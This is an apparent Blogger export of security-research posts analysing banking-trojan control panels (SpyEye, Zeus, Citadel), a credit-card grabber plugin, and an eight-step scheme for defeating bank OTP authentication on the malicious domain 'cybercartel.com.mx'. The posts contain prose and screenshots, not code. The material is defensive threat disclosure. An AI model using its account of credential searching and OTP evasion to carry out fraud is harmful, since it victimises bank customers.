Este sistema proporciona directamente la ventaja de poderse conectar en remoto contra las bases de datos que contienen toda la información confidencial de los usuarios comprometidos sin tener que acceder a los Paneles de Control donde están alojados los repositorios de datos. Se realizan consultas directamente sobre las bases de datos sin tener que interferir en ningún momento con el funcionamiento del Panel de Control que maneja todos los Botnets o máquinas zombis.<br />
<br />
De esta manera los criminales también evitan dejar rastros en los servidores webs cada vez que tengan que realizar alguna operación sobre los datos capturados no dejando trazas en los ficheros de logs del servidor web.<br />
<br />
La conexión con las bases de datos del Panel de Control del troyano es bastante sencilla:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-RWmD43gMe-4/UI6Y2cmaXOI/AAAAAAAAAQk/SyPc2IwJy6k/s1600/1-b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" qea="true" src="http://3.bp.blogspot.com/-RWmD43gMe-4/UI6Y2cmaXOI/AAAAAAAAAQk/SyPc2IwJy6k/s320/1-b.jpg" width="320" /></a></div>
En las opciones de configuración del Panel de Control se le indica las cadenas de conexión de la base de Datos donde esta almacenado el repositorio del troyano así como el tipo del troyano del cual se quiere extraer la información para analizarla y procesarla.<br />
<br />
Los tipos de Troyano con los que trabaja la aplicación son: Carbep , Citadel , ICE9, SpyEye , Zeus 1.1 , Zeus 1.2 , Zeus2.<br />
<br />
Todos estos troyanos son diferentes en su funcionamiento pero guardan bastantes similitudes en la forma en la que almacenan la información robada en la base de datos y la herramienta es capaz de adaptarse a la estructura de cada base de datos de dichos troyanos.<br />
<br />
El motor de búsqueda de datos en los repositorios está basado en la potencia de las expresiones regulares tal como se observa:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Kuh8El10Rbo/UI6ZDBqLZJI/AAAAAAAAAQs/rKgcOtf9ePA/s1600/1-c.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" qea="true" src="http://4.bp.blogspot.com/-Kuh8El10Rbo/UI6ZDBqLZJI/AAAAAAAAAQs/rKgcOtf9ePA/s400/1-c.jpg" width="400" /></a></div>
En este ejemplo que aparece creado por defecto en el panel de control, se observa la expresión regular que se debería emplear para localizar en el repositorio de datos del troyano todas las credenciales de acceso robadas que cumplan el formato definido usuario / password para acceder a los sitios Webs de Paypal y Ebay <br />
<br />
Estas expresiones regulares permiten buscar en toda la base de datos del troyano los datos confidenciales de los usuarios mediante la definición de los nombres de variables que almacenan las contraseñas o cualquier dato comprometido que se deseen localizar<br />
<br />
Con las expresiones regulares se puede definir cualquier formato de búsqueda de texto , como pueden ser direcciones de correo electrónico , fechas , números de pasaporte , de la seguridad social , etc . Las posibilidades son innumerables.<br />
<br />
Se pude crear incluso plantillas de búsqueda y almacenarla para acciones futuras.<br />
<br />
El motor de búsqueda también permite opciones de búsqueda por identificadores de las máquinas zombies , direcciones de URL e incluso datos de los correos capturados por las cabeceras en los usuarios comprometidos.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-ksaUcBUV0Bg/UI6ZTLBGvxI/AAAAAAAAAQ0/cVoRAfuqBAA/s1600/1-d.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" qea="true" src="http://1.bp.blogspot.com/-ksaUcBUV0Bg/UI6ZTLBGvxI/AAAAAAAAAQ0/cVoRAfuqBAA/s400/1-d.jpg" width="400" /></a></div>
Dispone un modulo automatizado para realizar búsqueda de datos de las tarjetas de crédito, en el que se le puede indicar campos clave de búsqueda como el código CVV de las tarjetas de crédito o el empleo del algoritmo Luhn.<br />
<br />
El algoritmo de Luhn o "algoritmo de módulo 10", es una fórmula de suma de verificación utilizado para validar números de identificación de las tarjetas de crédito.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-oxcpHN2Lv_Y/UI6ZaNyYR9I/AAAAAAAAAQ8/OYL7bu1Eim0/s1600/1-cards.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="51" qea="true" src="http://3.bp.blogspot.com/-oxcpHN2Lv_Y/UI6ZaNyYR9I/AAAAAAAAAQ8/OYL7bu1Eim0/s400/1-cards.jpg" width="400" /></a></div>
<br />Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-84077524841438155452012-10-17T16:30:00.000-07:002012-10-17T16:30:09.538-07:00Troyano SPYEYE contra Latinoamerica<br />
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">En la misma
infraestructura fraudulenta que estaba alojado el dominio “<b>cybercartel.com.mx</b>” analizado en el articulo anterior también aparece instalado el panel de control del
troyano SPYEYE estando totalmente operativo y recolectando datos de los
usuarios infectados.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Esta
instalado el kit completo del troyano Spyeye , tanto el modulo dedicado al
control de bots y propagación de Malware , como el modulo de gestión y control
de los datos capturados en los equipos comprometidos.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Se observa
como el Panel de Control de los bots o máquinas zombies continua estando activo
y enviando ordenes a los equipos infectados:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-NsGCKtY_9OU/UH8868LsJyI/AAAAAAAAAPA/EozzD1iNXYg/s1600/spyeye.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="283" src="http://3.bp.blogspot.com/-NsGCKtY_9OU/UH8868LsJyI/AAAAAAAAAPA/EozzD1iNXYg/s400/spyeye.JPG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Hasta el
momento del análisis el Panel controlaba 1185 equipos infectados. Estos equipos
pertenecen únicamente a usuarios que habitan en Argentina , Bolivia , Chile y
Mexico, debido a que, como se vio en el articulo anterior, el servidor donde
esta montada toda la infraestructura criminal esta configurada para rechazar
las conexiones de usuarios que no pertenecen a los países antes citados
mediante el control de accesos que realiza en el archivo .htaccess.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"> </span><span style="font-family: Arial; font-size: 11pt;"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-2MScBQeZR2Q/UH89JV-dgAI/AAAAAAAAAPI/8HQjwjlw9O4/s1600/stats.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="161" src="http://4.bp.blogspot.com/-2MScBQeZR2Q/UH89JV-dgAI/AAAAAAAAAPI/8HQjwjlw9O4/s400/stats.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">En las
opciones del Panel de Control se puede configurar diferentes plugins con sus
funciones especificas para el control de los equipos zombies y la captura de
datos confidenciales en las victimas.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"> </span><a href="http://2.bp.blogspot.com/-D_5tJNenrFs/UH89Q03J00I/AAAAAAAAAPQ/g0FWdZkS5Kw/s1600/plugins.jpg" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="400" src="http://2.bp.blogspot.com/-D_5tJNenrFs/UH89Q03J00I/AAAAAAAAAPQ/g0FWdZkS5Kw/s400/plugins.jpg" width="331" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">El otro
modulo que viene acompañado casi siempre en el Panel del Spyeye esta dedicado a
la gestión de los datos capturados por el troyano en las máquinas infectadas.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">El Panel de
control de este modulo presenta el siguiente aspecto:<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-UX1P0kvvPlc/UH89eDDWnjI/AAAAAAAAAPY/dctaadq60UA/s1600/grabber.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="281" src="http://4.bp.blogspot.com/-UX1P0kvvPlc/UH89eDDWnjI/AAAAAAAAAPY/dctaadq60UA/s400/grabber.JPG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Este Modulo dispone de
una gran variedad de opciones para capturar todo tipo de datos e información en los
equipos infectados , como puede ser las credenciales de acceso a servidores FTP
, certificados del cliente , pantallazos del equipo de la victima, datos de las
tarjetas de crédito. Así como la gestión y búsqueda de información confidencial
en los repositorios de logs de las victimas:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"> </span><a href="http://3.bp.blogspot.com/-GN57k2b2JQw/UH8-cmn4U1I/AAAAAAAAAPo/njMypMV7aDk/s1600/search.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="216" src="http://3.bp.blogspot.com/-GN57k2b2JQw/UH8-cmn4U1I/AAAAAAAAAPo/njMypMV7aDk/s640/search.jpg" width="640" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><!--[if gte vml 1]><v:shape
id="_x0000_i1029" type="#_x0000_t75" style='width:424.5pt;height:143.25pt'>
<v:imagedata src="file:///C:\Windows\Temp\msohtml1\01\clip_image008.jpg"
o:title="search"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--><o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Uno de los
plugins que tiene activos es el CC Grabber cuya misión consiste en buscar entre
todos los Logs recolectados por el troyano los códigos de numeración de las
tarjetas de créditos, así como los datos confidenciales necesarios para operar
con ellas como el CVV y fecha de caducidad de la tarjeta.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Cada vez
que un usuario infectado por el troyano Spyeye realiza una compra en algún
comercio electrónico de Internet , todos los datos confidenciales de su tarjeta
de crédito que introduzca en dicho comercio van a ser capturados por el troyano
y enviados al servidor fraudulento donde esta instalado el Panel de Control.
Debido a que el troyano tiene capacidad para capturar todos los datos que se
envíen mediante el método POST del protocolo http antes de que sean cifrados
por el navegador del usuario.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">El plugín
funciona como una pequeña aplicación de minería de datos capaz de reconocer la
numeración de 16 dígitos de la tarjeta de crédito y sus datos asociados y
almacenarlos para que posteriormente sean usados por los criminales para la
realización de fraudes con dicha tarjeta del cliente.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Aquí se
observa como se han capturado los datos de una tarjeta de crédito en una
transacción comercial por Internet:<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"> </span><span style="font-family: Arial; font-size: 11pt;"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/--xydiMuUTHQ/UH8-ZmKxkhI/AAAAAAAAAPg/eJB-ou6XeAU/s1600/cards.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://4.bp.blogspot.com/--xydiMuUTHQ/UH8-ZmKxkhI/AAAAAAAAAPg/eJB-ou6XeAU/s400/cards.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">En la
infraestructura del mismo servidor fraudulento se ha localizado también el kit
de propagación de Malware “<b>UMBRA LOADER</b>”
<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-dDJCYNQgjho/UH8-sR2BlgI/AAAAAAAAAPw/lPEMxD54DvQ/s1600/umbra.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="http://3.bp.blogspot.com/-dDJCYNQgjho/UH8-sR2BlgI/AAAAAAAAAPw/lPEMxD54DvQ/s400/umbra.JPG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Este kit de
infección todavía no ha comenzado la campaña de propagación de Malware,
estando prácticamente inactivo.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><!--[if gte vml 1]><v:shape
id="_x0000_i1032" type="#_x0000_t75" style='width:425.25pt;height:298.5pt'>
<v:imagedata src="file:///C:\Windows\Temp\msohtml1\01\clip_image014.jpg"
o:title="umbra2"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--><o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-NP_v1pJVxv0/UH8-x4S5UGI/AAAAAAAAAP4/C70i4TRepOE/s1600/umbra2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="http://3.bp.blogspot.com/-NP_v1pJVxv0/UH8-x4S5UGI/AAAAAAAAAP4/C70i4TRepOE/s400/umbra2.JPG" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-57034367679430520442012-10-10T07:30:00.002-07:002012-10-10T07:36:55.988-07:00Detected attack to evade OTP authentication devices in Latin American Financial Institutions<br />
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">Has been discovered a criminal website infrastructure prepared to evade the OTP (One Time Password) authentication mechanisms used at Latin American electronic banking institutions with fraudulent purposes.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">This site is hosted in the malicious domain "<b><i>cybercartel.com.mx</i></b>" that is hosted at the IP 65.254.32.66 in USA.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">Criminals have just targeted its attack against customers of banks in Argentina, Bolivia, Chile and Mexico in a very practical way that is blocking access to the fraudulent server from any IP address that is not in the IP range of ISPs operating in those countries.</span><span lang="EN-US" style="color: #333333; font-family: "Georgia","serif"; font-size: 12pt; mso-ansi-language: EN-US; mso-bidi-font-family: 'Times New Roman'; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">Criminals have modified the .htaccess Apache server file defining a list of alloweds IP ranges to access, and any attempt to access from an IP not allowed will return a 403 Forbidden error as seen in the screenshot:<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-anXPTNdTg5I/UHMv3fqP32I/AAAAAAAAANI/W0JnON4S_dk/s1600/forbidden.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="347" src="http://4.bp.blogspot.com/-anXPTNdTg5I/UHMv3fqP32I/AAAAAAAAANI/W0JnON4S_dk/s640/forbidden.jpg" width="640" /></a></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0pt; text-align: center;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">With this method criminals manage to get several objectives. On one hand they get a high number of positive impacts of infected users in focused countries, reducing server load and also rejecting connections of not interesting users and deny access to most of companies of Antivirus and Computer Security and also police forces of other countries seeking to investigate malicious content at fraudulent server.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">The .htaccess file has the following format:</span><span lang="EN-US" style="color: #333333; font-family: "Georgia","serif"; font-size: 12pt; mso-ansi-language: EN-US; mso-bidi-font-family: 'Times New Roman'; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-oPAXf2P90aQ/UHMwK8N2HsI/AAAAAAAAANQ/syiO1dBQ76c/s1600/access.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="http://4.bp.blogspot.com/-oPAXf2P90aQ/UHMwK8N2HsI/AAAAAAAAANQ/syiO1dBQ76c/s400/access.jpg" width="400" /></a></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0pt; text-align: center;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span style="color: #333333; font-family: "Georgia","serif"; font-size: 12pt; mso-bidi-font-family: 'Times New Roman'; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;"> </span><span style="color: #333333; font-family: Georgia, serif; font-size: 12pt;"> </span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">Have been removed the remaining lines of access IP ranges due to the large number of them.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">In the following paragraphs we will explain how to perform the attack to avoid OTP authentication mechanisms of the electronic banking financial institutions affected.</span><span lang="EN-US" style="color: #333333; font-family: "Georgia","serif"; font-size: 12pt; mso-ansi-language: EN-US; mso-bidi-font-family: 'Times New Roman'; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
</div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
</div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">The process for conducting fraudulent transactions by criminals is synthesized in the following steps:</span><span lang="EN-US" style="color: #333333; font-family: "Georgia","serif"; font-size: 12pt; mso-ansi-language: EN-US; mso-bidi-font-family: 'Times New Roman'; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0cm 0cm 0pt 53.4pt; text-indent: -18pt;">
<br /></div>
<div class="MsoListParagraphCxSpFirst" style="margin: 0cm 0cm 0pt 35.4pt; text-indent: -18pt;">
1 - <span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">User's computer is infected with a banking Troyan.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin: 0cm 0cm 0pt 35.4pt; text-indent: -18pt;">
2 - <span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">Troyan begins to capture all credentials and passwords of sites accessed by the user with classical keylogging techniques .<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin: 0cm 0cm 0pt 35.4pt; text-indent: -18pt;">
3 - <span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">When user access its banks account in Internet the Troyan is activated and start to take control of user navigation.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin: 0cm 0cm 0pt 35.4pt; text-indent: -18pt;">
4 - <span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">At that moment Troyan sends an alert via Jabber messenger to a criminal fraudster who is operating in remote and that will make an illegitimate transfer order accessing in parallel to the bank account of the user with the credentials captured by the keylogger before<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin: 0cm 0cm 0pt 35.4pt; text-indent: -18pt;">
5 - <span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">When the banking application requests to criminal the OTP operations keys or any other password needed to validate the fraudulent transfer, criminal send a command to the infected user's computer asking to enter this OTP.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin: 0cm 0cm 0pt 35.4pt; text-indent: -18pt;">
6 - <span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">Troyan will process this command displaying a window on the user's navigation, requesting the actual OTP key and user will type in usually thinking that is a normal checking operation of its electronic bank.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin: 0cm 0cm 0pt 35.4pt; text-indent: -18pt;">
7 - <span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">The typed OTP code is captured by the Troyan from the infected computer and sent back to criminal via Jabber<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpLast" style="margin: 0cm 0cm 0pt 35.4pt; text-indent: -18pt;">
8 - <span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">The criminal type this code in the session that started before validating the fraud transfer, ending operation with complete success.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0cm 0cm 0pt 17.4pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">Here is taught in absolute novelty one of these control panels with which criminals operate to perform the attack to evade the OTP (One Time Password) validation systems<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0cm 0cm 0pt -54pt;">
<br /></div>
<br />
<br />
<div class="MsoNormal" style="margin: 0cm 0cm 0pt -54pt;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-YQ2t7asQKsE/UHMweEsLJxI/AAAAAAAAANY/7JLrSaxPR34/s1600/OTP.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="http://4.bp.blogspot.com/-YQ2t7asQKsE/UHMweEsLJxI/AAAAAAAAANY/7JLrSaxPR34/s640/OTP.JPG" width="640" /></a></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0pt; text-align: center;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<span lang="EN-US" style="color: #333333; font-family: "Arial","sans-serif"; mso-ansi-language: EN-US; mso-fareast-font-family: 'Times New Roman'; mso-fareast-language: ES;">It is noted how operator connects remotely and receive information in real time with sensitive data from the victim and when he will start the fraud process will request the necessary key data using the following menu commands:<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0pt;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-HmWGWViWuCw/UHMwqehelRI/AAAAAAAAANg/osC0Fgk6uBE/s1600/token.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-HmWGWViWuCw/UHMwqehelRI/AAAAAAAAANg/osC0Fgk6uBE/s400/token.jpg" width="281" /></a></div>
<div align="center" class="MsoNormal" style="margin-bottom: 0pt; text-align: center;">
